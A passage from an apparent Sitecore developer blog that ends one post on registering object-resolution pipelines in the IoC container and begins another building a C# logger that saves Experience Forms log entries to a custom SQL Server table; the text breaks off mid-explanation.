CreateConfigObject<ObjectLocatorServiceSettings>(provider, "moduleSettings/foundation/objectResolution/objectLocatorServiceSettings"); } private void ConfigureObjectResolvers(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<IReflectionObjectCreator, ReflectionObjectCreator>(); serviceCollection.AddSingleton(GetObjectResolverServiceSettings); serviceCollection.AddSingleton<IObjectResolver, ObjectResolverService>(); } private ObjectResolverServiceSettings GetObjectResolverServiceSettings(IServiceProvider provider) { return CreateConfigObject<ObjectResolverServiceSettings>(provider, "moduleSettings/foundation/objectResolution/objectResolverServiceSettings"); } private void ConfigureResolveItemPipelineProcessors(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<IAddDefaultItemResolver, AddDefaultItemResolver>(); serviceCollection.AddSingleton<IResolveItem, ResolveItem>(); } private void ConfigureResolveTypePipelineProcessors(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<ISetItemResolver, SetItemResolver>(); serviceCollection.AddSingleton<Pipelines.ResolveType.ResolveTypeProcessor.IResolveItem, Pipelines.ResolveType.ResolveTypeProcessor.ResolveItem>(); serviceCollection.AddSingleton<ISetTypeName, SetTypeName>(); serviceCollection.AddSingleton<IAddDefaultTypeResolver, AddDefaultTypeResolver>(); serviceCollection.AddSingleton<Pipelines.ResolveType.SetTypeCacherProcessor.ISetTypeCacher, Pipelines.ResolveType.SetTypeCacherProcessor.SetTypeCacher>(); serviceCollection.AddSingleton<Pipelines.ResolveType.ResolveTypeProcessor.IResolveType, Pipelines.ResolveType.ResolveTypeProcessor.ResolveType>(); } private void ConfigureLocateObjectPipelineProcessors(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<Pipelines.LocateObject.SetTypeResolverProcessor.ISetTypeResolver, Pipelines.LocateObject.SetTypeResolverProcessor.SetTypeResolver>(); serviceCollection.AddSingleton<Pipelines.LocateObject.ResolveTypeProcessor.IResolveType, Pipelines.LocateObject.ResolveTypeProcessor.ResolveType>(); serviceCollection.AddSingleton<IAddDefaultObjectLocator, AddDefaultObjectLocator>(); 
serviceCollection.AddSingleton<ILocateObject, LocateObject>(); } private void ConfigureCreateObjectPipelineProcessors(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<ISetTypeResolver, SetTypeResolver>(); serviceCollection.AddSingleton<IResolveType, ResolveType>(); serviceCollection.AddSingleton<IAddDefaultObjectCreator, AddDefaultObjectCreator>(); serviceCollection.AddSingleton<ICreateObject, CreateObject>(); serviceCollection.AddSingleton<ISetTypeCacher, SetTypeCacher>(); serviceCollection.AddSingleton<ICacheType, CacheType>(); } private void ConfigureResolveObjectPipelineProcessors(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<Pipelines.ResolveObject.ISetTypeResolver, Pipelines.ResolveObject.SetTypeResolver>(); serviceCollection.AddSingleton<Pipelines.ResolveObject.ResolveTypeProcessor.IResolveType, Pipelines.ResolveObject.ResolveTypeProcessor.ResolveType>(); serviceCollection.AddSingleton<ISetObjectLocator, SetObjectLocator>(); serviceCollection.AddSingleton<Pipelines.ResolveObject.LocateObjectProcessor.ILocateObject, Pipelines.ResolveObject.LocateObjectProcessor.LocateObject>(); serviceCollection.AddSingleton<ISetObjectCreator, SetObjectCreator>(); serviceCollection.AddSingleton<Pipelines.ResolveObject.CreateObjectProcessor.ICreateObject, Pipelines.ResolveObject.CreateObjectProcessor.CreateObject>(); } private void ConfigureOtherServices(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<IReflectionUtilService, ReflectionUtilService>(); } private TConfigObject CreateConfigObject<TConfigObject>(IServiceProvider provider, string path) where TConfigObject : class { BaseFactory factory = GetService<BaseFactory>(provider); return factory.CreateObject(path, true) as TConfigObject; } private TService GetService<TService>(IServiceProvider provider) { return provider.GetService<TService>(); } } } Finally, I strung all the pieces together using the following Sitecore patch config file: <configuration xmlns:patch="http://www.sitecore.net/xmlconfig/"> <sitecore> <services> <configurator type="Sandbox.Foundation.ObjectResolution.ObjectResolutionConfigurator, Sandbox.Foundation.ObjectResolution" /> </services> <pipelines> <resolveItem> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.AddDefaultItemResolverProcessor.IAddDefaultItemResolver, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.ResolveItemProcessor.IResolveItem, Sandbox.Foundation.ObjectResolution" resolve="true" /> </resolveItem> <resolveType> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetItemResolverProcessor.ISetItemResolver, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.ResolveTypeProcessor.IResolveItem, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetTypeNameProcessor.ISetTypeName, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.AddDefaultTypeResolverProcessor.IAddDefaultTypeResolver, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetTypeCacherProcessor.ISetTypeCacher, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor 
type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.ResolveTypeProcessor.IResolveType, Sandbox.Foundation.ObjectResolution" resolve="true" /> </resolveType> <locateObject> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.SetTypeResolverProcessor.ISetTypeResolver, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.ResolveTypeProcessor.IResolveType, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.AddDefaultObjectLocatorProcessor.IAddDefaultObjectLocator, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.LocateObjectProcessor.ILocateObject, Sandbox.Foundation.ObjectResolution" resolve="true" /> </locateObject> <createObject> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeResolverProcessor.ISetTypeResolver, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.ResolveTypeProcessor.IResolveType, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.AddDefaultObjectCreatorProcessor.IAddDefaultObjectCreator, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CreateObjectProcessor.ICreateObject, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeCacherProcessor.ISetTypeCacher, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CacheTypeProcessor.ICacheType, Sandbox.Foundation.ObjectResolution" resolve="true" /> </createObject> <resolveObject> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.ISetTypeResolver, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.ResolveTypeProcessor.IResolveType, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectLocatorProcessor.ISetObjectLocator, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.LocateObjectProcessor.ILocateObject, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectCreatorProcessor.ISetObjectCreator, Sandbox.Foundation.ObjectResolution" resolve="true" /> <processor type="Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.CreateObjectProcessor.ICreateObject, Sandbox.Foundation.ObjectResolution" resolve="true" /> </resolveObject> </pipelines> <moduleSettings> <foundation> <objectResolution> <itemResolverServiceSettings type="Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers.ItemResolverServiceSettings, Sandbox.Foundation.ObjectResolution" singleInstance="true"> <ResolveItemPipelineName>resolveItem</ResolveItemPipelineName> </itemResolverServiceSettings> <typeResolverServiceSettings type="Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers.TypeResolverServiceSettings, Sandbox.Foundation.ObjectResolution" singleInstance="true"> 
<ResolveTypePipelineName>resolveType</ResolveTypePipelineName> </typeResolverServiceSettings> <objectLocatorServiceSettings type="Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators.ObjectLocatorServiceSettings, Sandbox.Foundation.ObjectResolution" singleInstance="true"> <LocateObjectPipelineName>locateObject</LocateObjectPipelineName> </objectLocatorServiceSettings> <objectCreatorServiceSettings type="Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators.ObjectCreatorServiceSettings, Sandbox.Foundation.ObjectResolution" singleInstance="true"> <CreateObjectPipelineName>createObject</CreateObjectPipelineName> </objectCreatorServiceSettings> <objectResolverServiceSettings type="Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers.ObjectResolverServiceSettings, Sandbox.Foundation.ObjectResolution" singleInstance="true"> <ResolveObjectPipelineName>resolveObject</ResolveObjectPipelineName> <UseTypeCache>true</UseTypeCache> </objectResolverServiceSettings> </objectResolution> </foundation> </moduleSettings> </sitecore> </configuration>

In my next post, I will be using the entire system above for resolving custom Forms Submit Actions from the Sitecore IoC container. Stay tuned for that post. If you have made it this far, hats off to you. 😉 Sorry for throwing so much at you, but that’s what I do. 😉 In closing, I would like to mention that the system above could also be used for resolving types from the Sitecore IoC container for WFFM, but this is something I will not investigate. If you happen to get this to work on WFFM, please share in a comment below. Until next time, keep on Sitecoring.

Write Sitecore Experience Forms Log Entries to a Custom SQL Server Database Table

Not long after I wrote the code for my last post, I continued exploring ways of changing service classes in Sitecore Experience Forms. One thing that popped out while continuing on this quest was Sitecore.ExperienceForms.Diagnostics.ILogger. I immediately thought “I just wrote code for retrieving Forms configuration settings from a SQL Server database table, so why not create a new ILogger service class for storing log entries in a custom SQL table?” Well, that’s what I did, and the code in this post captures how I went about doing it. You might be asking “Mike, you know you can just use a SQL appender in log4net, right?” Well, I certainly could have, but what fun would that have been? Anyway, let’s get started. We first need a class that represents a log entry. I created the following POCO class to serve that purpose: using System; namespace Sandbox.Foundation.Forms.Models.Logging { public class LogEntry { public Exception Exception { get; set; } public string LogEntryType { get; set; } public string LogMessage { get; set; } public string Message { get; set; } public object Owner { get; set; } public DateTime CreatedDate { get; set; } } } Since I hate calling the “new” keyword when creating new instances of classes, I chose to create a factory class.
The following interface will be for instances of classes that create LogEntry instances: using System; using Sandbox.Foundation.Forms.Models.Logging; namespace Sandbox.Foundation.Forms.Services.Factories.Diagnostics { public interface ILogEntryFactory { LogEntry CreateLogEntry(string logEntryType, string message, Exception exception, Type ownerType, DateTime createdDate); LogEntry CreateLogEntry(string logEntryType, string message, Exception exception, object owner, DateTime createdDate); LogEntry CreateLogEntry(string logEntryType, string message, Type ownerType, DateTime createdDate); LogEntry CreateLogEntry(string logEntryType, string message, object owner, DateTime createdDate); } } Well, we can’t do much with just an interface. The following class implements the interface above. Each method creates a LogEntry instance from the passed parameters (assuming the required parameters are passed with proper values on them). Note the (object) casts in the Type-based overloads: without them, overload resolution would bind those calls right back to the Type-based overloads themselves and recurse forever: using System; using Sandbox.Foundation.Forms.Models.Logging; namespace Sandbox.Foundation.Forms.Services.Factories.Diagnostics { public class LogEntryFactory : ILogEntryFactory { public LogEntry CreateLogEntry(string logEntryType, string message, Exception exception, Type ownerType, DateTime createdDate) { return CreateLogEntry(logEntryType, message, exception, (object)ownerType, createdDate); } public LogEntry CreateLogEntry(string logEntryType, string message, Exception exception, object owner, DateTime createdDate) { if (!CanCreateLogEntry(logEntryType, message, owner, createdDate)) { return null; } return new LogEntry { LogEntryType = logEntryType, Message = message, Exception = exception, Owner = owner, CreatedDate = createdDate }; } public LogEntry CreateLogEntry(string logEntryType, string message, Type ownerType, DateTime createdDate) { return CreateLogEntry(logEntryType, message, (object)ownerType, createdDate); } public LogEntry CreateLogEntry(string logEntryType, string message, object owner, DateTime createdDate) { if(!CanCreateLogEntry(logEntryType, message, owner, createdDate)) { return null; } return new LogEntry { LogEntryType = logEntryType, Message = message, Owner = owner, CreatedDate = createdDate }; } protected virtual bool CanCreateLogEntry(string logEntryType, string message, object owner, DateTime createdDate) { return !string.IsNullOrWhiteSpace(logEntryType) && !string.IsNullOrWhiteSpace(message) && owner != null && createdDate != DateTime.MinValue && createdDate != DateTime.MaxValue; } } } I didn’t want to send LogEntry instances directly to a repository class instance, so I created the following class to represent the entities which will ultimately be stored in the database: using System; namespace Sandbox.Foundation.Forms.Models.Logging { public class RepositoryLogEntry { public string LogEntryType { get; set; } public string LogMessage { get; set; } public DateTime Created { get; set; } } } As I had done with LogEntry, I created a factory class for it. The difference here is we will be passing an instance of LogEntry to this new factory so we can create a RepositoryLogEntry instance from it.
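For illustration, here is how a consuming class might use the LogEntry factory once it is wired into the IoC container further down (the SomeService class and the message values are mine, purely for illustration, and not part of the actual solution):

using System;
using Sandbox.Foundation.Forms.Models.Logging;
using Sandbox.Foundation.Forms.Services.Factories.Diagnostics;

namespace Sandbox.Foundation.Forms.Services
{
    public class SomeService // hypothetical consumer, not from this post's solution
    {
        private readonly ILogEntryFactory _logEntryFactory;

        public SomeService(ILogEntryFactory logEntryFactory)
        {
            _logEntryFactory = logEntryFactory;
        }

        public void DoWork()
        {
            try
            {
                // ... work that might throw ...
            }
            catch (Exception ex)
            {
                // Returns null if CanCreateLogEntry() rejects the arguments (e.g. an empty message).
                LogEntry entry = _logEntryFactory.CreateLogEntry("ERROR", "Something went sideways.", ex, typeof(SomeService), DateTime.UtcNow);
                // Hand the entry off to a repository, or inspect it in a test.
            }
        }
    }
}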
The following interface is for factories of RepositoryLogEntry: using System; using Sandbox.Foundation.Forms.Models.Logging; namespace Sandbox.Foundation.Forms.Services.Factories.Diagnostics { public interface IRepositoryLogEntryFactory { RepositoryLogEntry CreateRepositoryLogEntry(LogEntry entry); RepositoryLogEntry CreateRepositoryLogEntry(string logEntryType, string logMessage, DateTime created); } } Now that we have the interface ready to go, we need an implementation class for it. The following class does the job: using System; using Sandbox.Foundation.Forms.Models.Logging; namespace Sandbox.Foundation.Forms.Services.Factories.Diagnostics { public class RepositoryLogEntryFactory : IRepositoryLogEntryFactory { public RepositoryLogEntry CreateRepositoryLogEntry(LogEntry entry) { if (entry == null) { return null; } return CreateRepositoryLogEntry(entry.LogEntryType, entry.LogMessage, entry.CreatedDate); } public RepositoryLogEntry CreateRepositoryLogEntry(string logEntryType, string logMessage, DateTime created) { if (!CanCreateRepositoryLogEntry(logEntryType, logMessage, created)) { return null; } return new RepositoryLogEntry { LogEntryType = logEntryType, LogMessage = logMessage, Created = created }; } protected virtual bool CanCreateRepositoryLogEntry(string logEntryType, string logMessage, DateTime created) { return !string.IsNullOrWhiteSpace(logEntryType) && !string.IsNullOrWhiteSpace(logMessage) && created != DateTime.MinValue && created != DateTime.MaxValue; } } } I’m following a similar structure here to the one I used in the LogEntryFactory class above. The CanCreateRepositoryLogEntry() method ensures required parameters are passed to methods on the class, and the null guard on the LogEntry overload keeps a null entry from blowing up the call. If the required values are not there, then a null reference is returned to the caller. Since I hate hardcoding things, I decided to create a service class that gets the newline character. The following interface is for classes that do that: namespace Sandbox.Foundation.Forms.Services.Environment { public interface IEnvironmentService { string GetNewLine(); } } This next class implements the interface above: namespace Sandbox.Foundation.Forms.Services.Environment { public class EnvironmentService : IEnvironmentService { public string GetNewLine() { return System.Environment.NewLine; } } } In the class above, I’m taking advantage of stuff built into the .NET library for getting the newline character. I love when I discover things like this, though I wish I had found something similar when trying to find an HTML break string for something I was working on the other day, but I digress (if you know of a way, please let me know in a comment below 😉 ). The above interface and class might seem out of place in this post, but I am using them when formatting messages for the LogEntry instances further down in another service class. Just keep an eye out for it. Since I loathe hardcoding strings with a passion, I like to hide these away in Sitecore configuration patch files and hydrate a POCO class instance with the values from the aforementioned configuration.
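As a quick aside, one nice side effect of wrapping System.Environment behind IEnvironmentService is testability: a hand-rolled stub like the following (my own sketch, not part of this post's solution) lets unit tests pin the newline character regardless of the OS the tests run on.

using Sandbox.Foundation.Forms.Services.Environment;

namespace Sandbox.Foundation.Forms.Tests.Stubs
{
    // Hypothetical test double: always returns "\n" so message-format assertions are OS-independent.
    public class FixedNewLineEnvironmentService : IEnvironmentService
    {
        public string GetNewLine()
        {
            return "\n";
        }
    }
}

With that aside out of the way, back to those configuration-driven settings.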
The following class is such a POCO settings object for a service class I will discuss further down in the post: namespace Sandbox.Foundation.Forms.Models.Logging { public class LogEntryServiceSettings { public string DebugLogEntryType { get; set; } public string ErrorLogEntryType { get; set; } public string FatalLogEntryType { get; set; } public string InfoLogEntryType { get; set; } public string WarnLogEntryType { get; set; } public string ExceptionPrefix { get; set; } public string MessagePrefix { get; set; } public string SourcePrefix { get; set; } public string NestedExceptionPrefix { get; set; } public string LogEntryTimeFormat { get; set; } } } Okay, so we need to know what “type” of LogEntry we are dealing with (is it an error, a warning, or what?) before sending it to a repository to save in the database. I created the following interface for service classes that return strings for the different LogEntry types, and also generate a log message from the data on the properties of the LogEntry instance. This generated message is what will end up in the database for the LogEntry: using Sandbox.Foundation.Forms.Models.Logging; namespace Sandbox.Foundation.Forms.Services.Diagnostics { public interface ILogEntryService { string GetDebugLogEntryType(); string GetErrorLogEntryType(); string GetFatalLogEntryType(); string GetInfoLogEntryType(); string GetWarnLogEntryType(); string GenerateLogMessage(LogEntry entry); } } And here is its implementation class: using System; using System.Text; using Sandbox.Foundation.Forms.Models.Logging; using Sandbox.Foundation.Forms.Services.Environment; namespace Sandbox.Foundation.Forms.Services.Diagnostics { public class LogEntryService : ILogEntryService { private readonly string _newLine; private readonly LogEntryServiceSettings _logEntryServiceSettings; public LogEntryService(IEnvironmentService environmentService, LogEntryServiceSettings logEntryServiceSettings) { _newLine = GetNewLine(environmentService); _logEntryServiceSettings = logEntryServiceSettings; } protected virtual string GetNewLine(IEnvironmentService environmentService) { return environmentService.GetNewLine(); } public string GetDebugLogEntryType() { return _logEntryServiceSettings.DebugLogEntryType; } public string GetErrorLogEntryType() { return _logEntryServiceSettings.ErrorLogEntryType; } public string GetFatalLogEntryType() { return _logEntryServiceSettings.FatalLogEntryType; } public string GetInfoLogEntryType() { return _logEntryServiceSettings.InfoLogEntryType; } public string GetWarnLogEntryType() { return _logEntryServiceSettings.WarnLogEntryType; } public string GenerateLogMessage(LogEntry entry) { if(!CanGenerateLogMessage(entry)) { return string.Empty; } string exceptionMessage = GenerateExceptionMessage(entry.Exception); if(string.IsNullOrWhiteSpace(exceptionMessage)) { return entry.Message; } return $"{entry.Message} {exceptionMessage}"; } protected virtual bool CanGenerateLogMessage(LogEntry entry) { return entry != null && !string.IsNullOrWhiteSpace(entry.Message) && entry.Owner != null; } protected virtual string GenerateExceptionMessage(Exception exception) { if(exception == null) { return string.Empty; } StringBuilder messageBuilder = new StringBuilder(); messageBuilder.Append(_logEntryServiceSettings.ExceptionPrefix).Append(exception.GetType().FullName); AppendNewLine(messageBuilder); messageBuilder.Append(_logEntryServiceSettings.MessagePrefix).Append(exception.Message); AppendNewLine(messageBuilder); if (!string.IsNullOrWhiteSpace(exception.Source)) {
messageBuilder.Append(_logEntryServiceSettings.SourcePrefix).Append(exception.Source); AppendNewLine(messageBuilder); } if(!string.IsNullOrWhiteSpace(exception.StackTrace)) { messageBuilder.Append(exception.StackTrace); AppendNewLine(messageBuilder); } if (exception.InnerException != null) { AppendNewLine(messageBuilder); messageBuilder.Append(_logEntryServiceSettings.NestedExceptionPrefix); AppendNewLine(messageBuilder, 3); messageBuilder.Append(GenerateExceptionMessage(exception.InnerException)); AppendNewLine(messageBuilder); } return messageBuilder.ToString(); } protected virtual void AppendNewLine(StringBuilder builder, int repeatCount = 1) { AppendRepeat(builder, _newLine, repeatCount); } protected virtual void AppendRepeat(StringBuilder builder, string stringToAppend, int repeatCount) { if (builder == null || string.IsNullOrWhiteSpace(stringToAppend) || repeatCount < 1) { return; } for(int i = 0; i < repeatCount; i++) { builder.Append(stringToAppend); } } } } I’m not going to discuss all the code in the above class as it should be self-explanatory. I do want to point out that GenerateLogMessage() will generate one of two strings, depending on whether an Exception was set on the LogEntry instance. If an Exception was set, we append the Exception details — the GenerateExceptionMessage() method generates a string from the Exception — onto the end of the LogEntry message. If it was not set, we just return the LogEntry message to the caller. Well, now we need a place to store the log entries. I used the following SQL script to create a new table for storing these: USE [ExperienceFormsSettings] GO CREATE TABLE [dbo].[ExperienceFormsLog]( [ID] [uniqueidentifier] NOT NULL, [LogEntryType] [nvarchar](max) NOT NULL, [LogMessage] [nvarchar](max) NOT NULL, [Created] [datetime] NOT NULL, CONSTRAINT [PK_ExperienceFormsLog] PRIMARY KEY CLUSTERED ( [ID] ASC )WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY] ) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY] GO ALTER TABLE [dbo].[ExperienceFormsLog] ADD DEFAULT (newsequentialid()) FOR [ID] GO I also sprinkled some magical database dust onto the table. 😉 Wonderful, we can now move on to the fun bit — actually writing some code to store these entries in the database table created from the SQL script above. I wrote the following POCO class to represent a SQL command — either a query or a statement (it really doesn’t matter, as it will support both): namespace Sandbox.Foundation.Forms.Models.Logging { public class SqlCommand { public string Sql { get; set; } public object[] Parameters { get; set; } } } I’m sure I could have found something in Sitecore.Kernel.dll that does exactly what the class above does, but I couldn’t find such a thing (if you know of such a class, please share in a comment below). Now we need a settings class for the SQL Logger I am writing further down in this post.
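Before getting to it, here is roughly the shape of the message GenerateLogMessage() produces for an entry that carries an exception. The values below are made up by me for illustration, and the prefixes assume the patch configuration shown later in this post:

Something went sideways. Exception: System.DivideByZeroException
Message: Attempted to divide by zero.
Source: Sandbox.Foundation.Forms
   at Sandbox.Foundation.Forms.Pipelines.RenderField.ThrowExceptionProcessor.Process(RenderFieldEventArgs args)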
As I had done for the LogEntryService class above, this data will be coming from Sitecore configuration: namespace Sandbox.Foundation.Forms.Models.Logging { public class SqlLoggerSettings { public string LogPrefix { get; set; } public string LogDatabaseConnectionStringName { get; set; } public string InsertLogEntrySqlFormat { get; set; } public string ConnectionStringNameColumnName { get; set; } public string FieldsPrefixColumnName { get; set; } public string FieldsIndexNameColumnName { get; set; } public int NotFoundOrdinal { get; set; } public string LogEntryTypeParameterName { get; set; } public string LogMessageParameterName { get; set; } public string CreatedParameterName { get; set; } } } Now the fun part — creating an implementation of Sitecore.ExperienceForms.Diagnostics.ILogger: using System; using Sitecore.Abstractions; using Sitecore.Data.DataProviders.Sql; using Sitecore.ExperienceForms.Diagnostics; using Sandbox.Foundation.Forms.Services.Factories; using Sandbox.Foundation.Forms.Models.Logging; using Sandbox.Foundation.Forms.Services.Factories.Diagnostics; namespace Sandbox.Foundation.Forms.Services.Diagnostics { public class SqlLogger : ILogger { private readonly SqlLoggerSettings _sqlLoggerSettings; private readonly BaseSettings _settings; private readonly BaseFactory _factory; private readonly SqlDataApi _sqlDataApi; private readonly ILogEntryFactory _logEntryFactory; private readonly ILogEntryService _logEntryService; private readonly IRepositoryLogEntryFactory _repositoryLogEntryFactory; public SqlLogger(SqlLoggerSettings sqlLoggerSettings, BaseSettings settings, BaseFactory factory, ISqlDataApiFactory sqlDataApiFactory, ILogEntryFactory logEntryFactory, IRepositoryLogEntryFactory repositoryLogEntryFactory, ILogEntryService logEntryService) { _sqlLoggerSettings = sqlLoggerSettings; _settings = settings; _factory = factory; _sqlDataApi = CreateSqlDataApi(sqlDataApiFactory); _logEntryFactory = logEntryFactory; _logEntryService = logEntryService; _repositoryLogEntryFactory = repositoryLogEntryFactory; } protected virtual SqlDataApi CreateSqlDataApi(ISqlDataApiFactory sqlDataApiFactory) { return sqlDataApiFactory.CreateSqlDataApi(GetLogDatabaseConnectionString()); } protected virtual string GetLogDatabaseConnectionString() { return _settings.GetConnectionString(GetLogDatabaseConnectionStringName()); } protected virtual string GetLogDatabaseConnectionStringName() { return _sqlLoggerSettings.LogDatabaseConnectionStringName; } public void Debug(string message) { Debug(message, GetDefaultOwner()); } public void Debug(string message, object owner) { SaveLogEntry(CreateLogEntry(GetDebugLogEntryType(), message, owner, GetLogEntryDateTime())); } protected virtual string GetDebugLogEntryType() { return _logEntryService.GetDebugLogEntryType(); } public void LogError(string message) { LogError(message, null, GetDefaultOwner()); } public void LogError(string message, object owner) { LogError(message, null, owner); } public void LogError(string message, Exception exception, Type ownerType) { LogError(message, exception, (object)ownerType); } public void LogError(string message, Exception exception, object owner) { SaveLogEntry(CreateLogEntry(GetErrorLogEntryType(), message, exception, owner, GetLogEntryDateTime())); } protected virtual string GetErrorLogEntryType() { return _logEntryService.GetErrorLogEntryType(); } public void Fatal(string message) { Fatal(message, null, GetDefaultOwner()); } public void Fatal(string message, object owner) { Fatal(message, null, owner); } public void 
Fatal(string message, Exception exception, Type ownerType) { Fatal(message, exception, (object)ownerType); } public void Fatal(string message, Exception exception, object owner) { SaveLogEntry(CreateLogEntry(GetFatalLogEntryType(), message, exception, owner, GetLogEntryDateTime())); } protected virtual string GetFatalLogEntryType() { return _logEntryService.GetFatalLogEntryType(); } public void Info(string message) { Info(message, GetDefaultOwner()); } public void Info(string message, object owner) { SaveLogEntry(CreateLogEntry(GetInfoLogEntryType(), message, owner, GetLogEntryDateTime())); } protected virtual string GetInfoLogEntryType() { return _logEntryService.GetInfoLogEntryType(); } public void Warn(string message) { Warn(message, GetDefaultOwner()); } public void Warn(string message, object owner) { SaveLogEntry(CreateLogEntry(GetWarnLogEntryType(), message, owner, GetLogEntryDateTime())); } protected virtual string AddPrefixToMessage(string message) { return string.Concat(_sqlLoggerSettings.LogPrefix, message); } protected virtual object GetDefaultOwner() { return this; } protected virtual LogEntry CreateLogEntry(string logEntryType, string message, Exception exception, Type ownerType, DateTime createdDate) { return _logEntryFactory.CreateLogEntry(logEntryType, message, exception, ownerType, createdDate); } protected virtual LogEntry CreateLogEntry(string logEntryType, string message, Exception exception, object owner, DateTime createdDate) { return _logEntryFactory.CreateLogEntry(logEntryType, message, exception, owner, createdDate); } protected virtual LogEntry CreateLogEntry(string logEntryType, string message, Type ownerType, DateTime createdDate) { return _logEntryFactory.CreateLogEntry(logEntryType, message, ownerType, createdDate); } protected virtual LogEntry CreateLogEntry(string logEntryType, string message, object owner, DateTime createdDate) { return _logEntryFactory.CreateLogEntry(logEntryType, message, owner, createdDate); } protected virtual string GetWarnLogEntryType() { return _logEntryService.GetWarnLogEntryType(); } protected virtual DateTime GetLogEntryDateTime() { return DateTime.UtcNow; } protected virtual void SaveLogEntry(LogEntry entry) { if (entry == null) { return; } entry.LogMessage = GenerateLogMessage(entry); RepositoryLogEntry repositoryEntry = CreateRepositoryLogEntry(entry); if (repositoryEntry == null) { return; } SaveRepositoryLogEntry(repositoryEntry); } protected virtual string GenerateLogMessage(LogEntry entry) { return _logEntryService.GenerateLogMessage(entry); } protected virtual RepositoryLogEntry CreateRepositoryLogEntry(LogEntry entry) { return _repositoryLogEntryFactory.CreateRepositoryLogEntry(entry); } protected virtual void SaveRepositoryLogEntry(RepositoryLogEntry entry) { if(!CanLogEntry(entry)) { return; } SqlCommand insertCommand = GetInsertCommand(entry); if(insertCommand == null) { return; } ExecuteNoResult(insertCommand); } protected virtual bool CanLogEntry(RepositoryLogEntry entry) { return entry != null && !string.IsNullOrWhiteSpace(entry.LogEntryType) && !string.IsNullOrWhiteSpace(entry.LogMessage) && entry.Created > DateTime.MinValue && entry.Created < DateTime.MaxValue; } protected virtual SqlCommand GetInsertCommand(RepositoryLogEntry entry) { return new SqlCommand { Sql = GetInsertLogEntrySql(), Parameters = GetInsertCommandParameters(entry) }; } protected virtual object[] GetInsertCommandParameters(RepositoryLogEntry entry) { return new object[] { GetLogEntryTypeParameterName(),
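// Note: as far as I can tell from how this array is consumed by SqlDataApi.Execute() below,
// Sitecore expects a flat array of alternating parameter name/value pairs, which is why each
// Get*ParameterName() call is immediately followed by the matching value from the entry.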
entry.LogEntryType, GetLogMessageParameterName(), entry.LogMessage, GetCreatedParameterName(), entry.Created }; } protected virtual string GetLogEntryTypeParameterName() { return _sqlLoggerSettings.LogEntryTypeParameterName; } protected virtual string GetLogMessageParameterName() { return _sqlLoggerSettings.LogMessageParameterName; } protected virtual string GetCreatedParameterName() { return _sqlLoggerSettings.CreatedParameterName; } protected virtual string GetInsertLogEntrySql() { return _sqlLoggerSettings.InsertLogEntrySqlFormat; } protected virtual void ExecuteNoResult(SqlCommand sqlCommand) { _factory.GetRetryer().ExecuteNoResult(() => { _sqlDataApi.Execute(sqlCommand.Sql, sqlCommand.Parameters); }); } } } Since there is a lot of code in the class above, I’m not going to talk through all of it — it should be clear what this class is doing for the most part. I do want to highlight the SaveRepositoryLogEntry() method: it takes in a RepositoryLogEntry instance; builds up a SqlCommand instance from it, using the insert SQL statement and parameters from the SqlLoggerSettings instance (these come from Sitecore configuration, and there are hooks on this class to allow for overriding them if needed); and passes the SqlCommand instance to the ExecuteNoResult() method, which uses the SqlDataApi instance to save to the database. Plus, I’m leveraging an “out of the box” “retryer” from Sitecore.Kernel.dll to ensure the 